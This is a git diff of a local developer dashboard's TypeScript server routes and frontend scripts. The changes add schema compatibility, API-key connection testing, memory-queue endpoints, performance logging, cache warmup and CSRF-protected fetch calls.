|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: { completed: state.phase === 'complete', issues_count: state.results?.issues_generated || 0 }
|
||||
},
|
||||
agent_status: state.perspectives
|
||||
};
|
||||
agent_status: state.perspectives
|
||||
};
|
||||
} else {
|
||||
// New schema: perspectives is string array, status in perspectives_completed/perspectives_failed
|
||||
const total = state.perspectives.length;
|
||||
const completedList = state.perspectives_completed || [];
|
||||
const failedList = state.perspectives_failed || [];
|
||||
const completed = completedList.length;
|
||||
const failed = failedList.length;
|
||||
const inProgress = total - completed - failed;
|
||||
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
failed,
|
||||
in_progress: inProgress,
|
||||
percent_complete: total > 0 ? Math.round(((completed + failed) / total) * 100) : 0
|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: {
|
||||
completed: state.phase === 'complete',
|
||||
issues_count: state.results?.issues_generated || state.issues_generated || 0
|
||||
}
|
||||
},
|
||||
// Convert string array to object array for UI compatibility
|
||||
agent_status: state.perspectives.map((p: string) => ({
|
||||
name: p,
|
||||
status: completedList.includes(p) ? 'completed' : (failedList.includes(p) ? 'failed' : 'pending')
|
||||
}))
|
||||
};
|
||||
}
|
||||
}
|
||||
// Old schema: metadata.perspectives (backward compat)
|
||||
|
||||
// Legacy schema: metadata.perspectives (backward compat)
|
||||
if (state.metadata?.perspectives) {
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
@@ -294,12 +354,20 @@ export async function handleDiscoveryRoutes(ctx: RouteContext): Promise<boolean>
|
||||
const enrichedDiscoveries = index.discoveries.map((d: any) => {
|
||||
const state = readDiscoveryState(discoveriesDir, d.discovery_id);
|
||||
const progress = readDiscoveryProgress(discoveriesDir, d.discovery_id);
|
||||
|
||||
// Extract statistics - handle both old and new formats
|
||||
// New format: stats in state.results object
|
||||
// Old format: stats directly in state
|
||||
const total_findings = state?.results?.total_findings ?? state?.total_findings ?? 0;
|
||||
const issues_generated = state?.results?.issues_generated ?? state?.issues_generated ?? 0;
|
||||
const priority_distribution = state?.results?.priority_distribution ?? state?.priority_distribution ?? {};
|
||||
|
||||
return {
|
||||
...d,
|
||||
phase: state?.phase || 'unknown',
|
||||
total_findings: state?.total_findings || 0,
|
||||
issues_generated: state?.issues_generated || 0,
|
||||
priority_distribution: state?.priority_distribution || {},
|
||||
total_findings,
|
||||
issues_generated,
|
||||
priority_distribution,
|
||||
progress: progress?.progress || null
|
||||
};
|
||||
});
|
||||
|
||||
@@ -7,6 +7,29 @@ import { join } from 'path';
|
||||
import { homedir } from 'os';
|
||||
import type { RouteContext } from './types.js';
|
||||
|
||||
/**
|
||||
* Get the ccw-help index directory path (pure function)
|
||||
* Priority: project path (.claude/skills/ccw-help/index) > user path (~/.claude/skills/ccw-help/index)
|
||||
* @param projectPath - The project path to check first
|
||||
*/
|
||||
function getIndexDir(projectPath: string | null): string | null {
|
||||
// Try project path first
|
||||
if (projectPath) {
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
if (existsSync(projectIndexDir)) {
|
||||
return projectIndexDir;
|
||||
}
|
||||
}
|
||||
|
||||
// Fall back to user path
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
if (existsSync(userIndexDir)) {
|
||||
return userIndexDir;
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
// ========== In-Memory Cache ==========
|
||||
interface CacheEntry {
|
||||
data: any;
|
||||
@@ -61,14 +84,15 @@ let watchersInitialized = false;
|
||||
|
||||
/**
|
||||
* Initialize file watchers for JSON indexes
|
||||
* @param projectPath - The project path to resolve index directory
|
||||
*/
|
||||
function initializeFileWatchers(): void {
|
||||
function initializeFileWatchers(projectPath: string | null): void {
|
||||
if (watchersInitialized) return;
|
||||
|
||||
const indexDir = join(homedir(), '.claude', 'skills', 'command-guide', 'index');
|
||||
const indexDir = getIndexDir(projectPath);
|
||||
|
||||
if (!existsSync(indexDir)) {
|
||||
console.warn(`Command guide index directory not found: ${indexDir}`);
|
||||
if (!indexDir) {
|
||||
console.warn(`ccw-help index directory not found in project or user paths`);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -152,15 +176,20 @@ function groupCommandsByCategory(commands: any[]): any {
|
||||
* @returns true if route was handled, false otherwise
|
||||
*/
|
||||
export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
const { pathname, url, req, res } = ctx;
|
||||
const { pathname, url, req, res, initialPath } = ctx;
|
||||
|
||||
// Initialize file watchers on first request
|
||||
initializeFileWatchers();
|
||||
initializeFileWatchers(initialPath);
|
||||
|
||||
const indexDir = join(homedir(), '.claude', 'skills', 'command-guide', 'index');
|
||||
const indexDir = getIndexDir(initialPath);
|
||||
|
||||
// API: Get all commands with optional search
|
||||
if (pathname === '/api/help/commands') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const searchQuery = url.searchParams.get('q') || '';
|
||||
const filePath = join(indexDir, 'all-commands.json');
|
||||
|
||||
@@ -191,6 +220,11 @@ export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Get workflow command relationships
|
||||
if (pathname === '/api/help/workflows') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const filePath = join(indexDir, 'command-relationships.json');
|
||||
const relationships = getCachedData('command-relationships', filePath);
|
||||
|
||||
@@ -207,6 +241,11 @@ export async function handleHelpRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Get commands by category
|
||||
if (pathname === '/api/help/commands/by-category') {
|
||||
if (!indexDir) {
|
||||
res.writeHead(404, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: 'ccw-help index directory not found' }));
|
||||
return true;
|
||||
}
|
||||
const filePath = join(indexDir, 'by-category.json');
|
||||
const byCategory = getCachedData('by-category', filePath);
|
||||
|
||||
|
||||
@@ -292,6 +292,14 @@ export async function handleLiteLLMApiRoutes(ctx: RouteContext): Promise<boolean
|
||||
return true;
|
||||
}
|
||||
|
||||
// Clean up health check service state for deleted provider
|
||||
try {
|
||||
const { getHealthCheckService } = await import('../services/health-check-service.js');
|
||||
getHealthCheckService().cleanupProvider(providerId);
|
||||
} catch (cleanupErr) {
|
||||
console.warn('[Provider Delete] Failed to cleanup health check state:', cleanupErr);
|
||||
}
|
||||
|
||||
broadcastToClients({
|
||||
type: 'LITELLM_PROVIDER_DELETED',
|
||||
payload: { providerId, timestamp: new Date().toISOString() }
|
||||
@@ -326,12 +334,43 @@ export async function handleLiteLLMApiRoutes(ctx: RouteContext): Promise<boolean
|
||||
return true;
|
||||
}
|
||||
|
||||
// Test connection using litellm client
|
||||
const client = getLiteLLMClient();
|
||||
const available = await client.isAvailable();
|
||||
// Get the API key to test (prefer first key from apiKeys array, fall back to default apiKey)
|
||||
let apiKeyValue: string | null = null;
|
||||
if (provider.apiKeys && provider.apiKeys.length > 0) {
|
||||
apiKeyValue = provider.apiKeys[0].key;
|
||||
} else if (provider.apiKey) {
|
||||
apiKeyValue = provider.apiKey;
|
||||
}
|
||||
|
||||
if (!apiKeyValue) {
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: 'No API key configured for this provider' }));
|
||||
return true;
|
||||
}
|
||||
|
||||
// Resolve environment variables in the API key
|
||||
const { resolveEnvVar } = await import('../../config/litellm-api-config-manager.js');
|
||||
const resolvedKey = resolveEnvVar(apiKeyValue);
|
||||
|
||||
if (!resolvedKey) {
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: 'API key is empty or environment variable not set' }));
|
||||
return true;
|
||||
}
|
||||
|
||||
// Determine API base URL
|
||||
const apiBase = provider.apiBase || getDefaultApiBase(provider.type);
|
||||
|
||||
// Test the API key connection
|
||||
const testResult = await testApiKeyConnection(provider.type, apiBase, resolvedKey);
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: available, provider: provider.type }));
|
||||
res.end(JSON.stringify({
|
||||
success: testResult.valid,
|
||||
provider: provider.type,
|
||||
latencyMs: testResult.latencyMs,
|
||||
error: testResult.error,
|
||||
}));
|
||||
} catch (err) {
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: false, error: (err as Error).message }));
|
||||
|
||||
@@ -1256,5 +1256,89 @@ RULES: Be concise. Focus on practical understanding. Include function signatures
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Add path to queue
|
||||
if (pathname === '/api/memory/queue/add' && req.method === 'POST') {
|
||||
handlePostRequest(req, res, async (body) => {
|
||||
const { path: modulePath, tool = 'gemini', strategy = 'single-layer' } = body;
|
||||
|
||||
if (!modulePath) {
|
||||
return { error: 'path is required', status: 400 };
|
||||
}
|
||||
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({
|
||||
action: 'add',
|
||||
path: modulePath,
|
||||
tool,
|
||||
strategy
|
||||
}) as { queueSize?: number; willFlush?: boolean; flushed?: boolean };
|
||||
|
||||
// Broadcast queue update event
|
||||
broadcastToClients({
|
||||
type: 'MEMORY_QUEUE_UPDATED',
|
||||
payload: {
|
||||
action: 'add',
|
||||
path: modulePath,
|
||||
queueSize: result.queueSize || 0,
|
||||
willFlush: result.willFlush || false,
|
||||
flushed: result.flushed || false,
|
||||
timestamp: new Date().toISOString()
|
||||
}
|
||||
});
|
||||
|
||||
return { success: true, ...result };
|
||||
} catch (error: unknown) {
|
||||
return { error: (error as Error).message, status: 500 };
|
||||
}
|
||||
});
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Get queue status
|
||||
if (pathname === '/api/memory/queue/status' && req.method === 'GET') {
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({ action: 'status' }) as Record<string, unknown>;
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ success: true, ...result }));
|
||||
} catch (error: unknown) {
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: (error as Error).message }));
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
// API: Memory Queue - Flush queue immediately
|
||||
if (pathname === '/api/memory/queue/flush' && req.method === 'POST') {
|
||||
handlePostRequest(req, res, async () => {
|
||||
try {
|
||||
const { memoryQueueTool } = await import('../../tools/memory-update-queue.js');
|
||||
const result = await memoryQueueTool.execute({ action: 'flush' }) as {
|
||||
processed?: number;
|
||||
success?: boolean;
|
||||
errors?: unknown[];
|
||||
};
|
||||
|
||||
// Broadcast queue flushed event
|
||||
broadcastToClients({
|
||||
type: 'MEMORY_QUEUE_FLUSHED',
|
||||
payload: {
|
||||
processed: result.processed || 0,
|
||||
success: result.success || false,
|
||||
errors: result.errors?.length || 0,
|
||||
timestamp: new Date().toISOString()
|
||||
}
|
||||
});
|
||||
|
||||
return { success: true, ...result };
|
||||
} catch (error: unknown) {
|
||||
return { error: (error as Error).message, status: 500 };
|
||||
}
|
||||
});
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
@@ -9,6 +9,15 @@ import { getCliToolsStatus } from '../../tools/cli-executor.js';
|
||||
import { checkVenvStatus, checkSemanticStatus } from '../../tools/codex-lens.js';
|
||||
import type { RouteContext } from './types.js';
|
||||
|
||||
// Performance logging helper
|
||||
const PERF_LOG_ENABLED = process.env.CCW_PERF_LOG === '1' || true; // Enable by default for debugging
|
||||
function perfLog(label: string, startTime: number, extra?: Record<string, unknown>): void {
|
||||
if (!PERF_LOG_ENABLED) return;
|
||||
const duration = Date.now() - startTime;
|
||||
const extraStr = extra ? ` | ${JSON.stringify(extra)}` : '';
|
||||
console.log(`[PERF][Status] ${label}: ${duration}ms${extraStr}`);
|
||||
}
|
||||
|
||||
/**
|
||||
* Check CCW installation status
|
||||
* Verifies that required workflow files are installed in user's home directory
|
||||
@@ -62,16 +71,39 @@ export async function handleStatusRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
|
||||
// API: Aggregated Status (all statuses in one call)
|
||||
if (pathname === '/api/status/all') {
|
||||
const totalStart = Date.now();
|
||||
console.log('[PERF][Status] === /api/status/all START ===');
|
||||
|
||||
try {
|
||||
// Check CCW installation status (sync, fast)
|
||||
const ccwStart = Date.now();
|
||||
const ccwInstallStatus = checkCcwInstallStatus();
|
||||
perfLog('checkCcwInstallStatus', ccwStart);
|
||||
|
||||
// Execute all status checks in parallel with individual timing
|
||||
const cliStart = Date.now();
|
||||
const codexStart = Date.now();
|
||||
const semanticStart = Date.now();
|
||||
|
||||
// Execute all status checks in parallel
|
||||
const [cliStatus, codexLensStatus, semanticStatus] = await Promise.all([
|
||||
getCliToolsStatus(),
|
||||
checkVenvStatus(),
|
||||
getCliToolsStatus().then(result => {
|
||||
perfLog('getCliToolsStatus', cliStart, { toolCount: Object.keys(result).length });
|
||||
return result;
|
||||
}),
|
||||
checkVenvStatus().then(result => {
|
||||
perfLog('checkVenvStatus', codexStart, { ready: result.ready });
|
||||
return result;
|
||||
}),
|
||||
// Always check semantic status (will return available: false if CodexLens not ready)
|
||||
checkSemanticStatus().catch(() => ({ available: false, backend: null }))
|
||||
checkSemanticStatus()
|
||||
.then(result => {
|
||||
perfLog('checkSemanticStatus', semanticStart, { available: result.available });
|
||||
return result;
|
||||
})
|
||||
.catch(() => {
|
||||
perfLog('checkSemanticStatus (error)', semanticStart);
|
||||
return { available: false, backend: null };
|
||||
})
|
||||
]);
|
||||
|
||||
const response = {
|
||||
@@ -82,10 +114,13 @@ export async function handleStatusRoutes(ctx: RouteContext): Promise<boolean> {
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
perfLog('=== /api/status/all TOTAL ===', totalStart);
|
||||
|
||||
res.writeHead(200, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify(response));
|
||||
return true;
|
||||
} catch (error) {
|
||||
perfLog('=== /api/status/all ERROR ===', totalStart);
|
||||
console.error('[Status Routes] Error fetching aggregated status:', error);
|
||||
res.writeHead(500, { 'Content-Type': 'application/json' });
|
||||
res.end(JSON.stringify({ error: (error as Error).message }));
|
||||
|
||||
@@ -42,6 +42,10 @@ import { randomBytes } from 'crypto';
|
||||
// Import health check service
|
||||
import { getHealthCheckService } from './services/health-check-service.js';
|
||||
|
||||
// Import status check functions for warmup
|
||||
import { checkSemanticStatus, checkVenvStatus } from '../tools/codex-lens.js';
|
||||
import { getCliToolsStatus } from '../tools/cli-executor.js';
|
||||
|
||||
import type { ServerConfig } from '../types/config.js';
|
||||
import type { PostRequestHandler } from './routes/types.js';
|
||||
|
||||
@@ -290,6 +294,56 @@ function setCsrfCookie(res: http.ServerResponse, token: string, maxAgeSeconds: n
|
||||
appendSetCookie(res, attributes.join('; '));
|
||||
}
|
||||
|
||||
/**
|
||||
* Warmup function to pre-populate caches on server startup
|
||||
* This runs asynchronously and non-blocking after the server starts
|
||||
*/
|
||||
async function warmupCaches(initialPath: string): Promise<void> {
|
||||
console.log('[WARMUP] Starting cache warmup...');
|
||||
const startTime = Date.now();
|
||||
|
||||
// Run all warmup tasks in parallel for faster startup
|
||||
const warmupTasks = [
|
||||
// Warmup semantic status cache (Python process startup - can be slow first time)
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const semanticStatus = await checkSemanticStatus();
|
||||
console.log(`[WARMUP] Semantic status: ${semanticStatus.available ? 'available' : 'not available'} (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] Semantic status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})(),
|
||||
|
||||
// Warmup venv status cache
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const venvStatus = await checkVenvStatus();
|
||||
console.log(`[WARMUP] Venv status: ${venvStatus.ready ? 'ready' : 'not ready'} (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] Venv status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})(),
|
||||
|
||||
// Warmup CLI tools status cache
|
||||
(async () => {
|
||||
const taskStart = Date.now();
|
||||
try {
|
||||
const cliStatus = await getCliToolsStatus();
|
||||
const availableCount = Object.values(cliStatus).filter(s => s.available).length;
|
||||
const totalCount = Object.keys(cliStatus).length;
|
||||
console.log(`[WARMUP] CLI tools status: ${availableCount}/${totalCount} available (${Date.now() - taskStart}ms)`);
|
||||
} catch (err) {
|
||||
console.warn(`[WARMUP] CLI tools status check failed: ${(err as Error).message}`);
|
||||
}
|
||||
})()
|
||||
];
|
||||
|
||||
await Promise.allSettled(warmupTasks);
|
||||
console.log(`[WARMUP] Cache warmup complete (${Date.now() - startTime}ms total)`);
|
||||
}
|
||||
|
||||
/**
|
||||
* Generate dashboard HTML with embedded CSS and JS
|
||||
*/
|
||||
@@ -640,10 +694,24 @@ export async function startServer(options: ServerOptions = {}): Promise<http.Ser
|
||||
try {
|
||||
const healthCheckService = getHealthCheckService();
|
||||
healthCheckService.startAllHealthChecks(initialPath);
|
||||
|
||||
// Graceful shutdown: stop health checks when server closes
|
||||
server.on('close', () => {
|
||||
console.log('[Server] Shutting down health check service...');
|
||||
healthCheckService.stopAllHealthChecks();
|
||||
});
|
||||
} catch (err) {
|
||||
console.warn('[Server] Failed to start health check service:', err);
|
||||
}
|
||||
|
||||
// Start cache warmup asynchronously (non-blocking)
|
||||
// Uses setImmediate to not delay server startup response
|
||||
setImmediate(() => {
|
||||
warmupCaches(initialPath).catch((err) => {
|
||||
console.warn('[WARMUP] Cache warmup failed:', err);
|
||||
});
|
||||
});
|
||||
|
||||
resolve(server);
|
||||
});
|
||||
server.on('error', reject);
|
||||
|
||||
@@ -6,6 +6,28 @@
|
||||
|
||||
import type { ProviderType } from '../../types/litellm-api-config.js';
|
||||
|
||||
/**
|
||||
* Validate API base URL format
|
||||
* Note: This is a local development tool, so we allow localhost and internal networks
|
||||
* for users who run local API gateways or proxies.
|
||||
* @param url - The URL to validate
|
||||
* @returns Object with valid flag and optional error message
|
||||
*/
|
||||
export function validateApiBaseUrl(url: string): { valid: boolean; error?: string } {
|
||||
try {
|
||||
const parsed = new URL(url);
|
||||
|
||||
// Must be HTTP or HTTPS
|
||||
if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
|
||||
return { valid: false, error: 'URL must use HTTP or HTTPS protocol' };
|
||||
}
|
||||
|
||||
return { valid: true };
|
||||
} catch {
|
||||
return { valid: false, error: 'Invalid URL format' };
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Result of an API key connection test
|
||||
*/
|
||||
@@ -44,25 +66,30 @@ export async function testApiKeyConnection(
|
||||
apiKey: string,
|
||||
timeout: number = 10000
|
||||
): Promise<TestResult> {
|
||||
// Validate URL to prevent SSRF
|
||||
const urlValidation = validateApiBaseUrl(apiBase);
|
||||
if (!urlValidation.valid) {
|
||||
return { valid: false, error: urlValidation.error };
|
||||
}
|
||||
|
||||
// Normalize apiBase: remove trailing slashes to prevent URL construction issues
|
||||
// e.g., "https://api.openai.com/v1/" -> "https://api.openai.com/v1"
|
||||
const normalizedApiBase = apiBase.replace(/\/+$/, '');
|
||||
|
||||
const controller = new AbortController();
|
||||
const timeoutId = setTimeout(() => controller.abort(), timeout);
|
||||
const startTime = Date.now();
|
||||
|
||||
try {
|
||||
if (providerType === 'anthropic') {
|
||||
// Anthropic format: POST /v1/messages with minimal payload
|
||||
const response = await fetch(`${apiBase}/messages`, {
|
||||
method: 'POST',
|
||||
// Anthropic format: Use /v1/models endpoint (no cost, no model dependency)
|
||||
// This validates the API key without making a billable request
|
||||
const response = await fetch(`${normalizedApiBase}/models`, {
|
||||
method: 'GET',
|
||||
headers: {
|
||||
'Content-Type': 'application/json',
|
||||
'x-api-key': apiKey,
|
||||
'anthropic-version': '2023-06-01',
|
||||
},
|
||||
body: JSON.stringify({
|
||||
model: 'claude-3-haiku-20240307',
|
||||
max_tokens: 1,
|
||||
messages: [{ role: 'user', content: 'Hi' }],
|
||||
}),
|
||||
signal: controller.signal,
|
||||
});
|
||||
|
||||
@@ -77,7 +104,7 @@ export async function testApiKeyConnection(
|
||||
const errorBody = await response.json().catch(() => ({}));
|
||||
const errorMessage = (errorBody as any)?.error?.message || response.statusText;
|
||||
|
||||
// 401 = invalid API key, other 4xx might be valid key with other issues
|
||||
// 401 = invalid API key
|
||||
if (response.status === 401) {
|
||||
return { valid: false, error: 'Invalid API key' };
|
||||
}
|
||||
@@ -91,8 +118,10 @@ export async function testApiKeyConnection(
|
||||
|
||||
return { valid: false, error: errorMessage };
|
||||
} else {
|
||||
// OpenAI-compatible format: GET /v1/models
|
||||
const modelsUrl = apiBase.endsWith('/v1') ? `${apiBase}/models` : `${apiBase}/v1/models`;
|
||||
// OpenAI-compatible format: GET /v{N}/models
|
||||
// Detect if URL already ends with a version pattern like /v1, /v2, /v4, etc.
|
||||
const hasVersionSuffix = /\/v\d+$/.test(normalizedApiBase);
|
||||
const modelsUrl = hasVersionSuffix ? `${normalizedApiBase}/models` : `${normalizedApiBase}/v1/models`;
|
||||
const response = await fetch(modelsUrl, {
|
||||
method: 'GET',
|
||||
headers: {
|
||||
|
||||
@@ -330,6 +330,32 @@ export class HealthCheckService {
|
||||
getMonitoredProviders(): string[] {
|
||||
return Array.from(this.timers.keys());
|
||||
}
|
||||
|
||||
/**
|
||||
* Clean up all state for a deleted provider
|
||||
* Call this when a provider is deleted to prevent memory leaks
|
||||
* @param providerId - The provider ID to clean up
|
||||
*/
|
||||
cleanupProvider(providerId: string): void {
|
||||
// Stop health check timer
|
||||
this.stopHealthCheck(providerId);
|
||||
|
||||
// Remove all key states for this provider
|
||||
const keysToRemove: string[] = [];
|
||||
for (const key of this.keyStates.keys()) {
|
||||
if (key.startsWith(`${providerId}:`)) {
|
||||
keysToRemove.push(key);
|
||||
}
|
||||
}
|
||||
|
||||
for (const key of keysToRemove) {
|
||||
this.keyStates.delete(key);
|
||||
}
|
||||
|
||||
if (keysToRemove.length > 0) {
|
||||
console.log(`[HealthCheck] Cleaned up ${keysToRemove.length} key state(s) for deleted provider ${providerId}`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
|
||||
@@ -304,6 +304,51 @@
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
/* Environment File Input Group */
|
||||
.env-file-input-group {
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
gap: 0.5rem;
|
||||
}
|
||||
|
||||
.env-file-input-row {
|
||||
display: flex;
|
||||
gap: 0.5rem;
|
||||
align-items: center;
|
||||
}
|
||||
|
||||
.env-file-input-row .tool-config-input {
|
||||
flex: 1;
|
||||
font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, monospace;
|
||||
font-size: 0.8125rem;
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
.env-file-input-row .btn-sm {
|
||||
flex-shrink: 0;
|
||||
display: inline-flex;
|
||||
align-items: center;
|
||||
gap: 0.25rem;
|
||||
padding: 0.5rem 0.75rem;
|
||||
font-size: 0.8125rem;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
.env-file-hint {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.375rem;
|
||||
font-size: 0.75rem;
|
||||
color: hsl(var(--muted-foreground));
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
}
|
||||
|
||||
.env-file-hint i {
|
||||
flex-shrink: 0;
|
||||
opacity: 0.7;
|
||||
}
|
||||
|
||||
.btn-ghost.text-destructive:hover {
|
||||
background: hsl(var(--destructive) / 0.1);
|
||||
}
|
||||
|
||||
@@ -174,7 +174,7 @@ function refreshRecentPaths() {
|
||||
*/
|
||||
async function removeRecentPathFromList(path) {
|
||||
try {
|
||||
const response = await fetch('/api/remove-recent-path', {
|
||||
const response = await csrfFetch('/api/remove-recent-path', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ path })
|
||||
|
||||
@@ -33,11 +33,14 @@ function initCliStatus() {
|
||||
* Load all statuses using aggregated endpoint (single API call)
|
||||
*/
|
||||
async function loadAllStatuses() {
|
||||
const totalStart = performance.now();
|
||||
console.log('[PERF][Frontend] loadAllStatuses START');
|
||||
|
||||
// 1. 尝试从缓存获取(预加载的数据)
|
||||
if (window.cacheManager) {
|
||||
const cached = window.cacheManager.get('all-status');
|
||||
if (cached) {
|
||||
console.log('[CLI Status] Loaded all statuses from cache');
|
||||
console.log(`[PERF][Frontend] Cache hit: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
// 应用缓存数据
|
||||
cliToolStatus = cached.cli || {};
|
||||
codexLensStatus = cached.codexLens || { ready: false };
|
||||
@@ -45,25 +48,32 @@ async function loadAllStatuses() {
|
||||
ccwInstallStatus = cached.ccwInstall || { installed: true, workflowsInstalled: true, missingFiles: [], installPath: '' };
|
||||
|
||||
// Load CLI tools config, API endpoints, and CLI Settings(这些有自己的缓存)
|
||||
const configStart = performance.now();
|
||||
await Promise.all([
|
||||
loadCliToolsConfig(),
|
||||
loadApiEndpoints(),
|
||||
loadCliSettingsEndpoints()
|
||||
]);
|
||||
console.log(`[PERF][Frontend] Config/Endpoints load: ${(performance.now() - configStart).toFixed(1)}ms`);
|
||||
|
||||
// Update badges
|
||||
updateCliBadge();
|
||||
updateCodexLensBadge();
|
||||
updateCcwInstallBadge();
|
||||
|
||||
console.log(`[PERF][Frontend] loadAllStatuses TOTAL (cached): ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
return cached;
|
||||
}
|
||||
}
|
||||
|
||||
// 2. 缓存未命中,从服务器获取
|
||||
try {
|
||||
const fetchStart = performance.now();
|
||||
console.log('[PERF][Frontend] Fetching /api/status/all...');
|
||||
const response = await fetch('/api/status/all');
|
||||
if (!response.ok) throw new Error('Failed to load status');
|
||||
const data = await response.json();
|
||||
console.log(`[PERF][Frontend] /api/status/all fetch: ${(performance.now() - fetchStart).toFixed(1)}ms`);
|
||||
|
||||
// 存入缓存
|
||||
if (window.cacheManager) {
|
||||
@@ -77,10 +87,11 @@ async function loadAllStatuses() {
|
||||
ccwInstallStatus = data.ccwInstall || { installed: true, workflowsInstalled: true, missingFiles: [], installPath: '' };
|
||||
|
||||
// Load CLI tools config, API endpoints, and CLI Settings
|
||||
await Promise.all([
|
||||
loadCliToolsConfig(),
|
||||
loadApiEndpoints(),
|
||||
loadCliSettingsEndpoints()
|
||||
const configStart = performance.now();
|
||||
const [configResult, endpointsResult, settingsResult] = await Promise.all([
|
||||
loadCliToolsConfig().then(r => { console.log(`[PERF][Frontend] loadCliToolsConfig: ${(performance.now() - configStart).toFixed(1)}ms`); return r; }),
|
||||
loadApiEndpoints().then(r => { console.log(`[PERF][Frontend] loadApiEndpoints: ${(performance.now() - configStart).toFixed(1)}ms`); return r; }),
|
||||
loadCliSettingsEndpoints().then(r => { console.log(`[PERF][Frontend] loadCliSettingsEndpoints: ${(performance.now() - configStart).toFixed(1)}ms`); return r; })
|
||||
]);
|
||||
|
||||
// Update badges
|
||||
@@ -88,9 +99,11 @@ async function loadAllStatuses() {
|
||||
updateCodexLensBadge();
|
||||
updateCcwInstallBadge();
|
||||
|
||||
console.log(`[PERF][Frontend] loadAllStatuses TOTAL: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
return data;
|
||||
} catch (err) {
|
||||
console.error('Failed to load aggregated status:', err);
|
||||
console.log(`[PERF][Frontend] loadAllStatuses ERROR after: ${(performance.now() - totalStart).toFixed(1)}ms`);
|
||||
// Fallback to individual calls if aggregated endpoint fails
|
||||
return await loadAllStatusesFallback();
|
||||
}
|
||||
@@ -350,7 +363,7 @@ async function loadCliToolsConfig() {
|
||||
*/
|
||||
async function updateCliToolEnabled(tool, enabled) {
|
||||
try {
|
||||
const response = await fetch('/api/cli/tools-config/' + tool, {
|
||||
const response = await csrfFetch('/api/cli/tools-config/' + tool, {
|
||||
method: 'PUT',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ enabled: enabled })
|
||||
@@ -796,7 +809,7 @@ function setDefaultCliTool(tool) {
|
||||
// Save to config
|
||||
if (window.claudeCliToolsConfig) {
|
||||
window.claudeCliToolsConfig.defaultTool = tool;
|
||||
fetch('/api/cli/tools-config', {
|
||||
csrfFetch('/api/cli/tools-config', {
|
||||
method: 'PUT',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ defaultTool: tool })
|
||||
@@ -851,7 +864,7 @@ function getCacheInjectionMode() {
|
||||
|
||||
async function setCacheInjectionMode(mode) {
|
||||
try {
|
||||
const response = await fetch('/api/cli/tools-config/cache', {
|
||||
const response = await csrfFetch('/api/cli/tools-config/cache', {
|
||||
method: 'PUT',
|
